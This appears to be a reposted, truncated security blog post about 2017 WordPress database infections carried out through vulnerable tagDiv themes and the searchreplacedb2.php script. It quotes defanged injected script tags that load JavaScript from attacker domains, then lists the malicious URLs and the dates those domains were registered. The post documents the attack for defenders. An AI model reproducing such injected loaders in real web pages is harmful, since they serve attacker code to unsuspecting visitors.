Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type=’text/javascript’ src=’hxxps://con1.sometimesfree[.]biz/c.js’></script>


<s cript type=”text/javascript”>var t = document.createElement(“script”);
t.type = “text/javascript”; t.src = “hxxps://src[.]dancewithme[.]biz/src.js“;


The most noticeable malicious URLs that we’ve seen lately are:

  • con1.sometimesfree[.]biz/c.js ( Bulgaria)
  • java.sometimesfree[.]biz/counter.js ( Bulgaria)
  • javascript.sometimesfree[.]biz/script.js ( Bulgaria)
  • js.givemealetter[.]biz/script.js ( Bulgaria)
  • go.givemealetter[.]biz/click.html ( Bulgaria)
  • traffictrade[.]life/scripts.js ( United Kingdom)
  • blue.traffictrade[.]life/main.js ( United Kingdom)
  • js.trysomethingnew[.]eu/analytics.js ( Bulgaria)
  • get.simplefunsite[.]info/rw.js (won’t resolve atm)
  • post.simplefunsite[.]info/go.php?rewrite=81 (won’t resolve atm)
  • src.dancewithme[.]biz/src.js ( – Russia)
  • go.dancewithme[.]biz/red.php ( – Russia)
  • mp.trymynewspirit[.]com/s.js ( Bulgaria)

They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on Aug 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite.info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017
  • trymynewspirit[.]com – created on September 18th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.

No Comments

Sorry, the comment form is closed at this time.


Fresh View Partners